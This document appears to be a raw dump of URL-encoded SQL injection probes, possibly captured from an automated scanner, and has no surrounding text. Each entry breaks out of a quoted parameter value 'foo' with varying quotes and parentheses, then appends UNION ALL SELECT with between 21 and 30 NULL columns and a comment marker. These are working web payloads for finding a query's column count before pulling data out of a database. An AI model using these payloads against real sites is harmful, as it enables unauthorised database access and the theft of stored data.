foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 